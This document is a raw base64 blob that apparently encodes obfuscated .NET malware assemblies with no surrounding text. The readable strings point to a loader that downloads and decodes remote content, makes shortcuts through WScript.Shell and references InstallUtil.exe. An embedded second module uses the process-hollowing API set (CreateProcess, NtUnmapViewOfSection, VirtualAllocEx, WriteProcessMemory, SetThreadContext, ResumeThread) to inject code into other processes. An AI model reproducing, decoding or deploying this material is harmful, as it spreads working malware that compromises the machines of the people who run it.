AAAGGCwFAQABAGAgAAAAABEYMgXnAAEAuCAAAAAAEwBRAAECAQDYIAAAAAATAFEABgIBAPggAAAAABMAUQALAgEAGCEAAAAAEwBRABACAQA4IQAAAAATAFEAFQIBAJwhAAAAABMAUQAaAgEAtiEAAAAAEwBRAB8CAQDAIQAAAAATAFEAJQICAPohAAAAABEYMgXnAAIAECIAAAAABhgsBQEAAgAYIgAAAAAWAFEAKgICADQiAAAAABMAUQAqAgIATiIAAAAABhgsBQEAAgBYIgAAAAAWAJMALwICADwlAAAAABEAUQABAQgAWCUAAAAAxgIrBjEACQB8JQAAAADGAqgANgAKAJglAAAAAIMAUQA5AgoAuCUAAAAAxgKFA0EACgDUJQAAAAARAFEAPgIKABImAAAAAAEAUQBGAgsAGyYAAAAABhgsBQEADAAkJgAAAAADAFEAJwAMAIYmAAAAAAYYLAUBAAwAnyYAAAAABhgsBQEADAAAAAEAUQAAAAEAKAAAAAIAQQAAAAMAswQAAAQArQQAAAUAtAAAAAYAOgAAAAEAUQAAAAEAtgQAAAEAUQAAAAEAUQAJACwFAQAZACwFBQARACwFAQAMACwFAQAUACwFAQAcACwFAQAkACwFAQAMAFEAJwAUAFEAJwAcAFEAJwAkAFEAJwBBACADLAApACsGMQApAKgANgBRANEAOgApAIUDQQBhAJkASAApACwFAQA8AFEAXAA0AAwDJwBpAAwDJwA0ABYDZwBpABYDZwA0ACwFAQBpACwFAQApACIGbQBRAK0GcwBxACwFeABxAF4GggCRAHwAiQCJACwFAQCpALoGkACpAPgEQQCpABMEQQCpADIGkwCxAFEGmAC5AI4DngCpAEoGpADJAGgGrADJAHsGvQDJANwDzwDRABIF4QDRAAAF5wDZAPcD6wChACwFAQDpACsA8QChAD4D9gChAHYD/ADxADMBAQGpAEoGBgH5ACoEDAH5AHIAEQGBAPgAGAFRAIkAHgEJAWUDJQERAbgAKwEZASwFAQAhASwFMgEpASwFAQAxASwFNwE5ASwFNwFBASwFNwFJASwFNwFRASwFNwFZASwFNwFhASwFPAFpASwFNwFxASwFNwF5ASwFNwGBASwFAQCJASwFAQCRASwFQQGZASwFAQAOACQAxAEuANMBTgIuANsBVwIuAOMBdgIuAOsBiQIuAPMBiQIuAPsBdgIuAAMCjwIuAAsCiQIuABMCiQIuABsCpwIuACMC0QIuACsC3gIuAOIAKANAABMALQNDABMALQNjABMALQODADMCKAODADsCKAOjADMCKAOjADsCKAPDABMANgPjADMCKAPjADsCKAMjARMALQMjAUMCPwNDARMALQNDARMCiQJjAUsCoQNgAhMALQOAAhMALQOgAhMALQPAAhMALQMgAxMALQNgAxMALQNJAU4BUwFYAV0BZQFqAXABdQGJAY0BkQGVAZoBpQELABIAGQAgAEUATgBVAGQAfwDMAASAAAABAAAAAAAAAAAAAAAAABoAAAAKAAAAAAAAAAAAAACyAVwAAAAAAAQAAAAAAAAAAAAAALsBDAQAAAAABAAAAAAAAAAAAAAAuwFTAAAAAAAAAAAAAQAAAPgFAAAJAAQACgAEAAAAEAAUAFEAAAAQAC8AUQAAAAAAMQBRACMAoAEjAK0BAAAAQWAxAENvbnRleHRWYWx1ZWAxAEludDMyAENsYXNzTGlicmFyeTMAXzUAZ2V0X1VURjgAQQBCAEMAWG5aWW5MAG1lcmRhAFByb2plY3REYXRhAG1zY29ybGliAE1pY3Jvc29mdC5WaXN1YWxCYXNpYwBMb2FkAHJlZWQAU3luY2hyb25pemVkAEdldE1ldGhvZAB0ZXN0ZABDcmVhdGVJbnN0YW5jZQBHZXRIYXNoQ29kZQBXaWUASW52b2tlAFJ1bnRpbWVUeXBlSGFuZGxlAEdldFR5cGVGcm9tSGFuZGxlAFNlY3VyaXR5UHJvdG9jb2xUeXBlAEdldFR5cGUATWV0aG9kQmFzZQBBcHBsaWNhdGlvbkJhc2UAQXBwbGljYXRpb25TZXR0aW5nc0Jhc2UAU3RyUmV2ZXJzZQBFZGl0b3JCcm93c2FibGVTdGF0ZQBHdWlkQXR0cmlidXRlAEVkaXRvckJyb3dzYWJsZUF0dHJpYnV0ZQBDb21WaXNpYmxlQXR0cmlidXRlAEFzc2VtYmx5VGl0bGVBdHRyaWJ1dGUAU3RhbmRhcmRNb2R1bGVBdHRyaWJ1dGUASGlkZU1vZHVsZU5hbWVBdHRyaWJ1dGUAQXNzZW1ibHlUcmFkZW1hcmtBdHRyaWJ1dGUAVGFyZ2V0RnJhbWV3b3JrQXR0cmlidXRlAEFzc2VtYmx5RmlsZVZlcnNpb25BdHRyaWJ1dGUAT2JmdXNjYXRpb25BdHRyaWJ1dGUATXlHcm91cENvbGxlY3Rpb25BdHRyaWJ1dGUAQXNzZW1ibHlEZXNjcmlwdGlvbkF0dHJpYnV0ZQBZYW5vQXR0cmlidXRlAENvbXBpbGF0aW9uUmVsYXhhdGlvbnNBdHRyaWJ1dGUAQXNzZW1ibHlQcm9kdWN0QXR0cmlidXRlAEFzc2VtYmx5Q29weXJpZ2h0QXR0cmlidXRlAEFzc2VtYmx5Q29tcGFueUF0dHJpYnV0ZQBSdW50aW1lQ29tcGF0aWJpbGl0eUF0dHJpYnV0ZQBnZXRfVmFsdWUAc2V0X1ZhbHVlAEdldE9iamVjdFZhbHVlAE5ld0xhdGVCaW5kaW5nAHNldF9FbmNvZGluZwBTeXN0ZW0uUnVudGltZS5WZXJzaW9uaW5nAEZyb21CYXNlNjRTdHJpbmcARG93bmxvYWRTdHJpbmcAVG9TdHJpbmcAR2V0Rm9sZGVyUGF0aABNaWNyb3NvZnQuVmlzdWFsQmFzaWMuTXlTZXJ2aWNlcy5JbnRlcm5hbABTeXN0ZW0uQ29tcG9uZW50TW9kZWwATGF0ZUNhbGwAQ2xhc3NMaWJyYXJ5My5kbGwAc2V0X1NlY3VyaXR5UHJvdG9jb2wAU3lzdGVtAFRyaW0AQm9vbGVhbgBBcHBEb21haW4AZ2V0X0N1cnJlbnREb21haW4AVmVyc2lvbgBTeXN0ZW0uQ29uZmlndXJhdGlvbgBTeXN0ZW0uR2xvYmFsaXphdGlvbgBJbnRlcmFjdGlvbgBTeXN0ZW0uUmVmbGVjdGlvbgBFeGNlcHRpb24ATWV0aG9kSW5mbwBDdWx0dXJlSW5mbwBsaXhvbwBsaXhvAFNwZWNpYWxGb2xkZXIAUmVzb3VyY2VNYW5hZ2VyAFNlcnZpY2VQb2ludE1hbmFnZXIAVXNlcgBDb21wdXRlcgBUb0xvd2VyAENsZWFyUHJvamVjdEVycm9yAFNldFByb2plY3RFcnJvcgBBY3RpdmF0b3IALmN0b3IALmNjdG9yAE1pY3Jvc29mdC5WaXN1YWxCYXNpYy5EZXZpY2VzAE1pY3Jvc29mdC5WaXN1YWxCYXNpYy5BcHBsaWNhdGlvblNlcnZpY2VzAFN5c3RlbS5SdW50aW1lLklu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EwD6AsADEwD6AuADEwD6AkAEEwD6AoAEEwD6AgEAAAAAAAsAAQAAAAAADADxAPYA+wAAAQUBDQESARcBHQFTAVcBWwFgAWQBbwGJA5YDCwASABkAIABFAE4AVQBkALYABAEhALoFAQAAASMA4gUBAAABJQDdBQEAAAEnAPgFAQAAASkA8wUBAAABKwA1BgEAAAEtAEcGAQAAAS8A5gMCAAABMQAJBgEAAAEzAIIAAQAEgAAAAQAAAAAAAAAAAAAAAAAbAAAACAAAAAAAAAAAAAAAfAFdAAAAAAACAAAAAAAAAAAAAACFAaUDAAAAAAIAAAAAAAAAAAAAAIUBVAAAAAAAAAAAAAEAAABwBQAACQAEAAoABAALAAgADAAIAAAAEAAUAFIAAAAQAEEAUgAAAAAAQwBSACMAagEjAHcBAAAAAABBYDEAQ29udGV4dFZhbHVlYDEAQ2xhc3MxAENsYXNzTGlicmFyeTEAVG9JbnQzMgBUb0ludDE2AEEAQgBDAEQARQBQcm9qZWN0RGF0YQBkYXRhAG1zY29ybGliAE1pY3Jvc29mdC5WaXN1YWxCYXNpYwBHZXRQcm9jZXNzQnlJZABSZXN1bWVUaHJlYWQAU3luY2hyb25pemVkAENyZWF0ZUluc3RhbmNlAEdldEhhc2hDb2RlAFJ1bnRpbWVUeXBlSGFuZGxlAEdldFR5cGVGcm9tSGFuZGxlAFZhbHVlVHlwZQBBcHBsaWNhdGlvbkJhc2UAQXBwbGljYXRpb25TZXR0aW5nc0Jhc2UARWRpdG9yQnJvd3NhYmxlU3RhdGUAR3VpZEF0dHJpYnV0ZQBFZGl0b3JCcm93c2FibGVBdHRyaWJ1dGUAQ29tVmlzaWJsZUF0dHJpYnV0ZQBBc3NlbWJseVRpdGxlQXR0cmlidXRlAFN0YW5kYXJkTW9kdWxlQXR0cmlidXRlAEhpZGVNb2R1bGVOYW1lQXR0cmlidXRlAEFzc2VtYmx5VHJhZGVtYXJrQXR0cmlidXRlAEFzc2VtYmx5RmlsZVZlcnNpb25BdHRyaWJ1dGUAT2JmdXNjYXRpb25BdHRyaWJ1dGUATXlHcm91cENvbGxlY3Rpb25BdHRyaWJ1dGUAQXNzZW1ibHlEZXNjcmlwdGlvbkF0dHJpYnV0ZQBZYW5vQXR0cmlidXRlAENvbXBpbGF0aW9uUmVsYXhhdGlvbnNBdHRyaWJ1dGUAQXNzZW1ibHlQcm9kdWN0QXR0cmlidXRlAEFzc2VtYmx5Q29weXJpZ2h0QXR0cmlidXRlAEFzc2VtYmx5Q29tcGFueUF0dHJpYnV0ZQBSdW50aW1lQ29tcGF0aWJpbGl0eUF0dHJpYnV0ZQBTdXBwcmVzc1VubWFuYWdlZENvZGVTZWN1cml0eUF0dHJpYnV0ZQBCeXRlAGdldF9WYWx1ZQBzZXRfVmFsdWUAR2V0T2JqZWN0VmFsdWUAZ2V0X1NpemUAU2l6ZU9mAFRvU3RyaW5nAHBhdGgATWFyc2hhbABNaWNyb3NvZnQuVmlzdWFsQmFzaWMuTXlTZXJ2aWNlcy5JbnRlcm5hbABTeXN0ZW0uQ29tcG9uZW50TW9kZWwAQ2xhc3NMaWJyYXJ5MS5kbGwAa2VybmVsMzIuZGxsAG50ZGxsLmRsbABLaWxsAFN5c3RlbQBCb29sZWFuAFZlcnNpb24AU3lzdGVtLkNvbmZpZ3VyYXRpb24AU3lzdGVtLkdsb2JhbGl6YXRpb24ATnRVbm1hcFZpZXdPZlNlY3Rpb24AU3lzdGVtLlJlZmxlY3Rpb24ARXhjZXB0aW9uAFJ1bgBDdWx0dXJlSW5mbwBaZXJvAEJ1ZmZlcgBSZXNvdXJjZU1hbmFnZXIAVXNlcgBCaXRDb252ZXJ0ZXIAQ29tcHV0ZXIAQ2xlYXJQcm9qZWN0RXJyb3IAU2V0UHJvamVjdEVycm9yAEFjdGl2YXRvcgAuY3RvcgAuY2N0b3IASW50UHRyAFN5c3RlbS5EaWFnbm9zdGljcwBNaWNyb3NvZnQuVmlzdWFsQmFzaWMuRGV2aWNlcwBNaWNyb3NvZnQuVmlzdWFsQmFzaWMuQXBwbGljYXRpb25TZXJ2aWNlcwBTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXMATWljcm9zb2Z0LlZpc3VhbEJhc2ljLkNvbXBpbGVyU2VydmljZXMAU3lzdGVtLlJ1bnRpbWUuQ29tcGlsZXJTZXJ2aWNlcwBTeXN0ZW0uUmVzb3VyY2VzAENsYXNzTGlicmFyeTEuUmVzb3VyY2VzLnJlc291cmNlcwBHZXRCeXRlcwBSZWZlcmVuY2VFcXVhbHMAUnVudGltZUhlbHBlcnMAQ3JlYXRlUHJvY2VzcwBDb25jYXQARm9ybWF0AE9iamVjdABXb3c2NEdldFRocmVhZENvbnRleHQAV293NjRTZXRUaHJlYWRDb250ZXh0AFZpcnR1YWxBbGxvY0V4AEFycmF5AGdldF9Bc3NlbWJseQBCbG9ja0NvcHkAUmVhZFByb2Nlc3NNZW1vcnkAV3JpdGVQcm9jZXNzTWVtb3J5AFN5c3RlbS5TZWN1cml0eQBJc051bGxPckVtcHR5AAAvQwBsAGEAcwBzAEwAaQBiAHIAYQByAHkAMQAuAFIAZQBzAG8AdQByAGMAZQBzAAALIgB7ADAAfQAiAAA